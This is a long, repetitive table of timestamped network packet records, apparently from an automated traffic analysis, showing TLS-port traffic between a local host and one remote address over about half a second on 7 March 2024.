                                                  Mar 7, 2024 10:47:31.652832031 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.652837992 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.652877092 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.653517962 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.653532028 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.653592110 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.653597116 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.653635025 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.654256105 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.654270887 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.654331923 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.654337883 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.654371977 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.655112028 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.655126095 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.655185938 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.655189991 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.655226946 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.655890942 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.655906916 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.655976057 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.655981064 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.656024933 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.656677961 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.656692028 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.656749010 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.656763077 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.656800985 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.657426119 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.657440901 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.657501936 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.657507896 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.657546043 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.658037901 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.658051014 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.658113003 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.658116102 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.658153057 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.658696890 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.658713102 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.658768892 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.658773899 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.658816099 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.659430981 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.659446001 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.659501076 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.659504890 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.659543991 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.660084963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.660099030 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.660151958 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.660156965 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.660196066 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.660785913 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.660809040 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.660887957 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.660892010 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.660933971 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.661561012 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.661582947 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.661628962 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.661633968 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.661657095 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.661679983 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.662266016 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.662285089 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.662355900 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.662358999 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.662396908 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.662952900 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.662969112 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.663032055 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.663036108 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.663072109 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.663681030 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.663697958 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.663753033 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.663755894 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.663803101 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.664521933 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.664537907 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.664598942 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.664602995 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.664633989 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.665086031 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.665102005 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.665157080 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.665160894 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.665194988 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.665751934 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.665766954 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.665807009 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.665811062 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.665838957 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.665860891 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.666390896 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.666405916 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.666460991 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.666465998 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.666500092 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.667129993 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.667144060 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.667201042 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.667203903 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.667237997 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.667836905 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.667853117 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.667896986 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.667901993 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.667968988 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.668589115 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.668605089 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.668658972 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.668663979 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.668701887 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.669472933 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.669488907 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.669543028 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.669547081 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.669583082 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.670197964 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.670212030 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.670268059 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.670273066 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.670309067 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.670833111 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.670846939 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.670902967 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.670907974 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.670945883 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.671530962 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.671551943 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.671608925 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.671614885 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.671653032 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.672475100 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.672488928 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.672544956 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.672550917 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.672589064 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.673146009 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.673161030 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.673213005 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.673217058 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.673254967 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.673993111 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.674010038 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.674062014 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.674067020 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.674103022 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.674726963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.674742937 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.674794912 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.674799919 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.674837112 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.675632954 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.675647020 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.675698996 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.675703049 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.675738096 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.676353931 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.676367998 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.676422119 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.676426888 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.676464081 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.677345037 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.677360058 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.677412987 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.677417994 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.677453995 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.678158045 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.678172112 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.678211927 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.678216934 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.678265095 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.678265095 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.678972006 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.678987026 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.679038048 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.679043055 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.679069996 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.679085970 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.679795980 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.679809093 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.679862976 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.679867983 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.679903984 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.680527925 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.680542946 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.680596113 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.680600882 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.680636883 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.681176901 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.681193113 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.681248903 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.681255102 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.681292057 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.681916952 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.681932926 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.681981087 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.681986094 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.682034969 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.682651997 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.682666063 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.682719946 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.682725906 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.682763100 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.683324099 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.683343887 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.683398962 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.683403969 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.683439970 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.684195042 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.684209108 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.684261084 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.684266090 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.684302092 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.684781075 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.684796095 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.684848070 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.684853077 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.684889078 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.685636997 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.685651064 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.685702085 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.685707092 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.685745001 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.686311007 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.686327934 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.686383963 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.686388969 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.686431885 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.687009096 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.687022924 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.687076092 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.687079906 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.687115908 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.687640905 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.687655926 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.687707901 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.687712908 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.687747002 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.688424110 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.688438892 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.688493967 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.688498020 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.688538074 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.689207077 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.689220905 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.689264059 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.689268112 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.689296007 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.689308882 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.689908981 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.689923048 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.689975977 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.689980984 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.690017939 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.690632105 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.690645933 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.690696955 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.690701962 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.690737963 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.691520929 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.691534996 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.691590071 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.691595078 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.691631079 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.692528009 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.692542076 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.692596912 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.692601919 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.692636967 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.693219900 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.693233967 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.693284988 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.693289995 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.693325043 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.694067955 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.694082022 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.694138050 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.694143057 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.694180965 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.694926023 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.694945097 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.694998026 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.695003986 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.695044041 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.695703983 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.695718050 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.695764065 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.695769072 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.695812941 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.696388960 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.696403980 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.696454048 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.696459055 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.696496010 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.697273016 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.697288036 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.697340012 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:31.697344065 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:31.697381020 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.052845955 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.052891016 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.052930117 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.052959919 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.052977085 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.052999020 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053004980 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053028107 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053051949 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053064108 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053073883 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053081989 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053118944 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053141117 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053298950 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053333044 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053347111 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053352118 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.053375959 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.053391933 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.054095984 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.054125071 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.054145098 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.054150105 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.054177999 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.054193974 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.054935932 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.054963112 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.054996967 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.055003881 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.055031061 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.055047035 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.055600882 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.055614948 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.055680990 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.055689096 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.055725098 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.055902958 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.055917978 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.055963993 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.055969000 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.056003094 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.056207895 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.056231022 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.056279898 CET49705443192.168.2.53.5.232.137
